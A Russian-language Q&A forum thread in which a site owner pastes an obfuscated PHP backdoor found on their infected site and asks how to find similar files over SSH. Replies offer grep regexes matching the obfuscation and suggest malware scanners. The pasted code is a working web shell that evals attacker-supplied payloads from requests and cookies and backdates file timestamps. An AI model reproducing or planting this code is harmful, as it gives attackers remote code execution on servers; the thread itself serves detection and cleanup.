bismoney
@bismoney

Поиск такого вируса ssh как?

Привет друзья!

Заразился сайт, открыл файл вируса.
$kgUsxEzsFdQ="".chr(98)."".""."".""."".chr(97).""."s"."".""."".""."".chr(101).""."6"."".""."".""."".chr(52)."".""."_".""."".""."d"."".""."e".""."".""."".chr(99)."".chr(111)."".""."d".""."".""."".chr(101);$dxkapiytRfmVUk=$kgUsxEzsFdQ(""."".""."".chr(88)."".chr(49).""."".""."".""."B"."".""."".chr(80).""."".""."U"."".chr(49)."".""."".chr(81)."".""."".chr(61));$GBWxBHKiwCJ=$$dxkapiytRfmVUk;$GdHitHucykx=false;if(isset($GBWxBHKiwCJ[$kgUsxEzsFdQ(""."".""."a"."".""."w".""."="."".""."".chr(61))])){$GdHitHucykx=$GBWxBHKiwCJ[$kgUsxEzsFdQ(""."".""."a"."".""."w".""."="."".""."".chr(61))];}$kZNyKDKKIPNwHpPD=""."h"."".""."".""."".chr(101).""."".chr(97).""."d".""."".""."".""."e"."".""."r";if(!$GdHitHucykx){$kZNyKDKKIPNwHpPD($kgUsxEzsFdQ(""."S"."".""."".""."".chr(70).""."".""."".chr(82).""."".""."".chr(85).""."U"."".""."".""."".chr(67)."".""."8"."".""."".""."".chr(120).""."".chr(76)."".""."".""."j".""."A"."".chr(103)."".""."".""."".chr(78)."".""."D"."".""."".""."A"."".""."".chr(48)."".""."I".""."".chr(69)."".""."".chr(53).""."".""."".chr(118)."".""."d".""."".""."C"."".""."".""."B"."".""."".""."".chr(71)."".chr(98).""."3"."".chr(86)."".""."".chr(117).""."".""."".""."Z".""."".""."A"."".""."".""."=".""."".""."="));exit($kgUsxEzsFdQ(""."".chr(78).""."D".""."".""."".""."A"."".""."z".""."".chr(73)."".""."".""."E".""."".chr(53).""."v".""."d"."".""."".""."".chr(67)."".""."".chr(66)."".""."".""."".chr(71)."".chr(98)."".chr(51)."".""."V".""."".""."".""."u".""."".""."Z"."".""."A".""."".""."".chr(61)."".""."".""."="));}eval($kgUsxEzsFdQ("QGlu".chr(97)."V9zZ".chr(88)."QoIm1lb".chr(87)."9yeV9saW1pdCIsICIx".chr(77)."DI0TSIpO".chr(119)."pA".chr(99)."".chr(50)."V0X".chr(51)."R".chr(112)."bWVf".chr(98)."Gl".chr(116)."aX".chr(81)."oM".chr(67)."k7CkBpZ25vcm".chr(86)."fdXNlcl9hYm9ydCh0cnVl".chr(75)."TsgC".chr(107)."BlcnJvcl9yZX".chr(66)."vcnRpbmco".chr(77)."".chr(67)."k".chr(55)."CmZ1bmN0aW9u".chr(73)."".chr(71)."NvbGxl".chr(89)."3QoKXsKCSRj".chr(98)."3VudCA9I".chr(68)."A7".chr(67)."".chr(103)."lpZihp".chr(99)."3Nld".chr(67)."gkX0dFVFsnYyddKSAmJ".chr(105)."BzdHJsZW4".chr(111)."JF9HRVRbJ2Mn".chr(88)."Sk+MCl7C".chr(103)."k".chr(74)."".chr(74)."G".chr(78)."vdW50ID0gJF".chr(57)."H".chr(82)."VR".chr(98)."J2MnXTsKCX1lbHNlI".chr(71)."".chr(108)."mKGlzc2V0K".chr(67)."RfU".chr(69)."9TVFsnYyddKSAmJ".chr(105)."Bzd".chr(72)."JsZW4oJF9QT".chr(49)."NUWydjJ10pP".chr(106)."A".chr(112)."ewoJCSRjb3VudCA9ICRfUE9TVFsnYyddOwoJfQoJ".chr(74)."F9jI".chr(68)."0gYXJ".chr(121)."YXkoK".chr(84)."sKCSRiNiA9ICJiYXNlNj".chr(81)."iLiIiLiJfIi4iZGVjI".chr(105)."4ib2RlIjsK".chr(67)."".chr(87)."Z".chr(118)."cigkaSA9I".chr(68)."E7ICRpIDw9I".chr(67)."Rjb3VudDsgJGkrKy".chr(65)."p".chr(101)."woJCWl".chr(109)."".chr(75)."Gl".chr(122)."c2V0KCRfU0VSVk".chr(86)."SW".chr(121)."".chr(74)."IVFR".chr(81)."X0NPT0tJRSIuJG".chr(108)."dKSA".chr(109)."JiBzdHJsZW4oJF9TRVJWRVJbIkhUVFBfQ0".chr(57)."PS0lFIi4kaV0pPjApewoJCQkkX2NbXT".chr(48)."g".chr(100)."HJpbSgkX".chr(49)."NFUlZFU".chr(108)."siSFRUUF9DT09LSUUiLi".chr(82)."pXSk".chr(55)."CgkJf".chr(81)."o".chr(74)."fQoJcm".chr(86)."0".chr(100)."XJuICRiNihpbXBsb2RlKCIiLCRf".chr(89)."yk".chr(112)."Owp".chr(57)."CkB".chr(48)."b3VjaCg".chr(107)."X".chr(49)."NFUlZFUlsiU0".chr(78)."SSVBUX0Z".chr(74)."TE".chr(86)."OQU1FI".chr(108)."0sKHRpbWUoKS0oMzY".chr(119)."MC".chr(111)."".chr(121)."NCozNjUqMykpKTsKQHRv".chr(100)."WNoK".chr(71)."Jh".chr(99)."2VuYW1lKCRfU".chr(48)."VSVk".chr(86)."SWyJ".chr(84)."Q1JJUFRfRkl".chr(77)."RU5BTUUi".chr(88)."S".chr(107)."".chr(115)."K".chr(72)."RpbWUoKS0oMzY".chr(119)."MCoyNCozNjUqMykpKTsKLy8kbGluZXMgPSBjb3VudChma".chr(87)."xlKCRfU0VSV".chr(107)."VSWyJTQ1JJUFRfRkl".chr(77)."RU5BTUUiXS".chr(107)."pOwovL2lmKCRsaW5lcyA9PSAyKXsKCSRfYyA9IGNvb".chr(71)."xlY3QoKTsKICBpZighZ".chr(87)."1wdHko".chr(74)."F9jKSAmJiB".chr(122)."dHJsZW4oJF9".chr(106)."".chr(75)."T4wKXsK".chr(73)."CAgICAgZXZhbCgkX2MpOwogIH1lbHNl".chr(101)."wog".chr(73)."CAgICBoZWFkZ".chr(88)."IoIkhUVFAvMS4wIDQwNC".chr(66)."Ob3QgRm91bmQiKTsKICB9Ci8vfW".chr(86)."".chr(115)."".chr(99)."2V7Ci8vC".chr(87)."hlY".chr(87)."Rlcigi".chr(83)."FRUUC8xLjAgN".chr(84)."A1IE5v".chr(100)."C".chr(66)."Gb3VuZCIpOwovL30="));exit();


Вирус закодирован. Все значения в других файлах другие.
Подскажите выражение для grep что бы найти все такие файлы по ssh пожалуйста.
  • Вопрос задан
  • 581 просмотр
Решения вопроса 2
NeiroNx
@NeiroNx
Программист
ищите по .""."".

В нормальных файлах такого быть не должно. Бессмысленная конструкция с точки зрения программиста - всего лишь результат обфускации кода.
Ответ написан
fox_12
@fox_12
Расставляю биты, управляю заряженными частицами
Как вариант -регулярками вида:
'\."\w?"\.chr\(\d{1,3}\)\."\w?"'
или
'\."\w?"\."\w?"\."\w?"'
пробежаться
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
eZhrv
@eZhrv
Growth Hacking, Agile marketing, A/B testing
Я бы перестраховался и
запустил ai-bolit (php)
www.securitylab.ru/blog/company/revisium/aibolit-e...
https://revisium.com/ai/
Ответ написан
Комментировать
@SashaSkot
Специалист широкого профиля
Чтобы прибить вирус - www.comodorus.ru/free_versions/detal/comodo_free/14
или ClamAV - оба про такое знают.
поставьте
Чтобы найти и избавиться от его внедрения - самый простой и довольно быстрый способ - это перенести сайт виндовс комп с Касперским.

+

https://habrahabr.ru/post/188878/
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
26 апр. 2024, в 07:20
2000 руб./за проект
26 апр. 2024, в 06:46
1000 руб./в час
26 апр. 2024, в 05:31
1000 руб./за проект